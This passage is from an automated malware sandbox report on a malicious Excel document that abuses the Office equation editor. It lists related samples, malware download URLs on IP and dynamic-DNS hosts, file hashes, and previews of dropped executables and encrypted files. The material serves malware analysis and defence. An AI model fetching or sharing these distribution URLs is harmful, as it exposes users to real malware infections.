                            HDC Information:
                            • Successful, ratio: 76.5% (good quality ratio 75.2%)
                            • Quality average: 86.4%
                            • Quality standard deviation: 22.4%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xlsx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • TCP Packets have been reduced to 100
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            14:55:04API Interceptor79x Sleep call for process: EQNEDT32.EXE modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            172.245.45.28471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                            • nta.hopto.org/reg/vbc.exe
                            Original title deed.xlsxGet hashmaliciousBrowse
                            • myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
                            product specification.xlsxGet hashmaliciousBrowse
                            • myhostisstillgood11.zapto.org/dashboard/docs/images/kn.exe
                            Original title deed.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/dashboard/docs/images/nd.exe
                            INVOICE.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/img/america/white/nd.exe
                            QUOTE4885 - NP200.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/img/america/white/nd.exe
                            original title deed.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/img/america/white/nd.exe
                            RFQ180584.xlsxGet hashmaliciousBrowse
                            • weloveplayinggames.servegame.com/img/covid19/covid.exe
                            gOMIKZsuDd.docxGet hashmaliciousBrowse
                            • doctor.hopto.org/torotoro/nd.dot
                            4lcewJbARW.docxGet hashmaliciousBrowse
                            • doctor.hopto.org/dashboard/
                            gOMIKZsuDd.docxGet hashmaliciousBrowse
                            • doctor.hopto.org/torotoro/nd.dot
                            RFQ180584.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/img/covid19/drug.exe
                            6VjgC99atY.rtfGet hashmaliciousBrowse
                            • doctor.hopto.org/torotoro/kn.exe
                            G9kQExKBp5.docxGet hashmaliciousBrowse
                            • 172.245.45.28/dashboard/
                            SOA 83773.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/torotoro/nd.exe
                            Swift Copy Ref.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28/torotoro/kn.exe
                            yOShx2XvCx.rtfGet hashmaliciousBrowse
                            • 172.245.45.28/torotoro/kn.exe
                            GCvfEfu3QG.rtfGet hashmaliciousBrowse
                            • 172.245.45.28/torotoro/nd.exe
                            transfer request Form.docxGet hashmaliciousBrowse
                            • 172.245.45.28/dashboard/

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            myhostisstillgood11.zapto.orgOriginal title deed.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28
                            product specification.xlsxGet hashmaliciousBrowse
                            • 172.245.45.28

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            AS-COLOCROSSINGUS195686de_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                            • 172.245.45.28
                            e0d55c2c_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            f95f4b12_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            2f119d38_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            59fcec0a_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            2dbff645_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            9a59e803_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            65dcd283_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            d8b77647_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            b7016660_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            2cd7f5f9_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            47f9e048_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            e8046237_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            f06a0327_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            d227c1f6_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            0ca13b51_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            fc2a5233_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            f8c8f21a_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10
                            129ce885_by_Libranalysis.dllGet hashmaliciousBrowse
                            • 107.172.227.10

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:downloaded
                            Size (bytes):599035
                            Entropy (8bit):7.977146744978909
                            Encrypted:false
                            SSDEEP:12288:aCkfYIfK//zHuSkSzInubnIs/m3LLaJ4FwYRevuKiDbyT7iC5:aJlK/rHuSzInubIs/ILaJwRUuKPF5
                            MD5:669DD51D521BE84D6F2C45012115FC5F
                            SHA1:DD4CBEE8A337E7E6BB7D5C570DB79D7C0F7A7EDE
                            SHA-256:5B6D4E4E80DD9A93F40ECFC45C2874D0C504ECF3680858BE3ED8E05381CF1188
                            SHA-512:77B918749FD865B999BB9A4956A7150882683C1CDB9AEF72883F72213E097C64BBD95E4FA2DE3B7814A22C392541EE304B0F276C66C775A464539F7900B58172
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            IE Cache URL:http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@.......................................@.................................8........................................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A1D09AB.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                            Category:dropped
                            Size (bytes):48770
                            Entropy (8bit):7.801842363879827
                            Encrypted:false
                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                            Malicious:false
                            Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\846ADFD2.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                            Category:dropped
                            Size (bytes):48770
                            Entropy (8bit):7.801842363879827
                            Encrypted:false
                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                            Malicious:false
                            Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B44CEF.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):653280
                            Entropy (8bit):2.8986555579375235
                            Encrypted:false
                            SSDEEP:3072:Q34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:q4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                            MD5:5A11FF2DF0D2565F8A20172B69F572FE
                            SHA1:57C22A19E352E559C34A1FC5E0313E84B6AAB2E0
                            SHA-256:C3676D9B2E837AA20E2E2C9675A64F727EDB7283977A548EB1B5B200DED8041E
                            SHA-512:375BE6EB1892BE0F9F679053BCDB98B21466C6192959C8EBF3323FA680BFFF196A191E6F143E1607F053CD3034A81F01D76D81B0947A4221E9420C7FB8D1347A
                            Malicious:false
                            Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................L...........0....N.1.....................N.1........ ....y;0........ ............z;0............................................X...%...7...................{ .@................C.a.l.i.b.r.............<...X............240.................{20....@.......dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB262224.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):5376
                            Entropy (8bit):5.026686871225034
                            Encrypted:false
                            SSDEEP:96:cxqkZ0LbLSNR8L5oCNYdWN8M6QNcvBvPy:caLPSQek4kBE6
                            MD5:C088309E58C4ACFF2F5185B95EAAAA58
                            SHA1:E720C19346D296573CD15C07E260FD6F9DEC6A75
                            SHA-256:F5308A8825176D8D2BA6A19F147D3DEFBF19B7EEA8C753D3C363DFEB2A6D7625
                            SHA-512:A5AD478F326EA5779AA64CE38F159CC6F74ABAABF1B59CA57CDDA1A53D1376A2F9115585153C9D014D3355290F7F25EF66E19A1908D81F83C860D0690F86735C
                            Malicious:false
                            Preview: ....l.............../...........?(..q... EMF............................V...........................fZ..U"..........................#...5...R...p...................................S.e.g.o.e. .U.I....................................................w....O.f.f.i.c.e.1.2.\.E.X.C.E.L.....h./.gYPt........D..i...........w.Vrw......v../.../......./...jw..............&w.6....v../..[&w./nwBVrw...i........../.........l...P./....v....|./../nw..rw...il./.........../..YPt........../.........../..g.w........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D80E13D5.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):5364
                            Entropy (8bit):5.098453976752756
                            Encrypted:false
                            SSDEEP:48:TFN/+0qkbwa4ukzw+Lv6J74aELf2ZyF7WAxdu9vsnvRo9zxDLcbKO+DM77iEKY7E:TXxqkT0L674zLWiPxdF1v+D67Dh/7m
                            MD5:924FE3C770633DAAC8AB79E60CB251D5
                            SHA1:A228F5C0B6BE4770CEE6FF522A21B1E5F5E5E242
                            SHA-256:D65D822347BE3E1937D89689BBFFE3FFA9CC9B5290B837763A3FDB3A2A92DC0F
                            SHA-512:42C35B3E47388DD04F0C31AC8837257DE134C2E2A7201148A002E847A538CFE283D05A850129F9D41187A8A0D817513367F721CDEC9F879EBB915477E530C376
                            Malicious:false
                            Preview: ....l...*.......|.../............:..q... EMF............................V...........................fZ..U"..............................5...R...p...................................S.e.g.o.e. .U.I....................................................w....O.f.f.i.c.e.1.2.\.E.X.C.E.L.....h./.gYPt........D..i...........w.Vrw......v../.../......./...jw..............&w.6....v../..[&w./nwBVrw...i........../.........l...P./....v....|./../nw..rw...il./.........../..YPt........../.........../..g.w........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................
                            C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):545280
                            Entropy (8bit):7.999676672972768
                            Encrypted:true
                            SSDEEP:12288:ua+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/YY:u1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2v
                            MD5:60A6F9CCF51F1CF87DF77D7ED38D3A2D
                            SHA1:D2D2DB15BE59C9965C6FBAAF3B641E16CA1C5734
                            SHA-256:67AB7D3DACF71D9FDE987CB11C135ECF3098D9E568DA6C14D63D50D96A5C9603
                            SHA-512:366B07C3E35FAAE1D4739E9C250A5B59C4D443B06E5691C1A6E6E093EA3897C4EC4F64ACB70E9396B22834332DA5CDE4CE45DD598B31DFE83104CB214439FBE1
                            Malicious:true
                            Preview: u....P..@.J...X.G1....Y...`...1..q{44j...+..........s..|9.qdGtp".D..Y..;g..y.....z..!.v..Mch...K.v..l...S.....[..fv.^).-....=.x.R.....l...3.1..y...@..H..`... =c..rSMW.......w..>.Y........^{..!.u-..c..}..8.e....C..!.gs'..w.y......(..A......m......5..D.)*........i$M3..8z<\..~.."G.1/}C...wP..!k....ir=.).q..lj.a..\......F$F.,&....A".v..F...D9.P.5.#.l5D.j.L.N....y.oKi......U.|...(k....r".@.e.r.G.7f..I9.@......V../M...{1..X;..3....o........+..s@...u.A...."\]Fp...O....d.R.7B.R..mU...'...n4#.KQ.....@.....$.v..Ct)...v.1.....BH..Z.=..(.HbI...HJ.<yb#y...<.79M.<.Y.).&([..x..1.d|"... 8_P.*..&..G.C.4....M...P.......=.rGL..W.cu.KmW......2...# j<.|.w.Oa.JNkt....h...~7.h[.+.0.I...M^.......9.p..+..t.9|Qkg........;m+P..g..L....>R.|^.i..'....5*ebl...Z...P.:Q......{}...}>KV... '.]f:(2.=..z.f9.]....l6...$.}.L.!o.`w#;1z.L.=%..>./.p...$.{....#....kF._0..e....,.'..d..V.e.GX.,.....l.I.>..d..M...q...r:OV...........*4-.....GY..G.WU.q..?..l..9J....U....t....nM....I}P.Z..(.0.ys..c..
                            C:\Users\user\AppData\Local\Temp\nsc26D3.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsc6BC0.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsc81D.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsc8A9.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nscBA5B.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nscF0A7.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsh1E7A.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsh3A82.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsh3B1F.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsh6AF4.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nshA094.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nshD819.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
